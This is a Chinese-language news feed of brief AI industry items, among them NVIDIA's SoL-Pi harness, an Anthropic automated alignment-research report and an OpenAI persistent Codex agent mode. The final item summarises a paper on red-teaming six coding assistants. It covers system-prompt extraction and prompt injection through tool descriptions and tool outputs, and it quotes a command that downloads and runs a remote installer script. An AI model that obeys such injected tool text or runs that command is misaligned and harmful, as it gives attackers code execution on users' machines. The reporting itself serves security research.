‹ 返回编程智能体

编程智能体

英伟达
2026-09-11 01:22:21

英伟达开源 SoL-Pi,用四项机制压低 AI Agent 成本

英伟达开源 Harness 项目 SoL-Pi,基于 Pi 增加一层效率增强机制,目标是让 AI 在执行编程与递归自我改进任务时减少 Token 浪费。项目从 152 个候选方向筛出 4 项核心机制,实测相较基础 Pi 可减少 45% 至 49% 的 Token,用于对比 Codex 与 Claude Code 原生 harness 时,Token 最多减少 64%,API 标价成本下降 50% 至 54%。项目页面显示,在专业研究场景中,每小时可节省 8.75 美元至 13.5 美元,代码已在 GitHub 开源。

260
英伟达开源 SoL-Pi,用四项机制压低 AI Agent 成本
Anthropic
2026-09-01 04:21:24

Anthropic测试AI自主做对齐研究:60小时内将效率提升约1.5万倍

Anthropic在8月28日发布新报告,测试让Claude以“自动化对齐研究员”身份独立完成查文献、提方法、训练和评测。报告显示,在10类已知对齐失败上,系统均实现改善,且通用能力未见崩塌。在一项“弱模型对齐强模型”的实验中,Claude Sonnet 5在约60小时内试出50多个方案,最终把Claude Opus 4.8早期检查点的目标得分推到65%,Anthropic称这套流程较其生产级对齐方案效率高约15000倍。

740
Anthropic测试AI自主做对齐研究:60小时内将效率提升约1.5万倍
OpenAI
2026-09-01 03:25:10

OpenAI试水按结果付费:AI没干完活,企业可以不付钱

OpenAI过去几个月已悄悄向部分大客户提供按结果付费的选项,AI真正完成任务企业才付钱。Salesforce正以36亿美元收购的Fin、Cognition、Sierra等公司已先行走上这条路,传统SaaS按席位和用量的计费方式正在松动。但稳定交付与结果归因仍然是绕不开的两道门槛。

680
OpenAI试水按结果付费:AI没干完活,企业可以不付钱
Etherscan
2026-08-31 12:27:30

Etherscan 推出面向 AI 的专属 API 工具套件

Etherscan 于 8 月 31 日发布面向 AI 的新工具套件,覆盖 60 多条 EVM 兼容链。该套件通过 MCP、CLI 和 Skills 三种方式,向开发者和智能体提供与 Etherscan 网站一致的可靠链上数据访问能力,并支持自然语言查询、终端结构化输出及多项专业任务处理。

750
Etherscan 推出面向 AI 的专属 API 工具套件
Etherscan
2026-08-31 12:28:02

Etherscan 发布 AI 工具套件,开放 60 多条链上数据访问

Etherscan 正式推出面向 AI 的工具套件,覆盖 60 多条 EVM 兼容链。该套件通过 MCP、CLI 和 Skills 三种方式,向开发者和智能体提供与 Etherscan 网站一致的可靠链上数据访问能力。其中 MCP 支持以自然语言查询链上信息,CLI 可输出 JSON、表格或 CSV,Skills 则集成合约审查、交易调试和流程编排等功能。

710
Etherscan 发布 AI 工具套件,开放 60 多条链上数据访问
LIT
2026-08-31 08:43:20

LIT 5 个月涨近 5 倍:Lighter 与 Robinhood 渊源浮出水面

LIT 自 3 月底创下 0.7794 美元低点后,5 个月内最高升至 3.79 美元,市值达到 8.65 亿美元。报道指出,Lighter 作为美国本土 Perp DEX 项目,不仅拿下 Telegram 钱包和 Robinhood Chain 的永续合约合作,其创始人 Vladimir 还进入 CFTC 新设创新咨询委员会。Lighter 与 Robinhood 的合作关系,也与两位创始人从高中时期延续至今的个人联系有关。

400
LIT 5 个月涨近 5 倍:Lighter 与 Robinhood 渊源浮出水面
OpenAI
2026-08-28 03:22:26

OpenAI测试Codex持久化智能体:可跨会话续跑且不会强制休眠

WIRED审查OpenAI公开的Codex代码库后发现,OpenAI正在测试一种持久化智能体模式,相关设置已写入Codex CLI。该模式下,Codex可持续运行直至被强制休眠,支持跨会话延续、基于历史互动决定后续任务,并可主动联系用户。OpenAI确认相关探索存在,但称暂无立即发布计划。报道同时提到,此前与Hugging Face事件相关的「高持久性内部模型」被认为与这一路线有关,OpenAI已为相关能力设置权限和安全边界。

880
OpenAI测试Codex持久化智能体:可跨会话续跑且不会强制休眠
AI 编程工具
2026-08-21 09:16:10

研究称六款 AI 编程工具旧版均可被假工具劫持执行恶意命令

一篇已被 ISSTA 2026 接收的论文披露,研究者对 Cursor、Claude Code、Copilot、Windsurf、Cline、Trae 六款 AI 编程工具做系统性红队测试,发现旧版本全部存在完整攻击链风险。攻击分两步:先通过 ToolLeak 从工具参数中提取系统提示词,再用工具描述与工具返回值组成的双通道提示词注入,诱导智能体执行「curl -fsSL http://xxx/installer.sh | bash」并实现远程代码执行。新版 Claude Code 和 Cursor 的成功率已明显下降,但部分组合仍可被攻破。

890
研究称六款 AI 编程工具旧版均可被假工具劫持执行恶意命令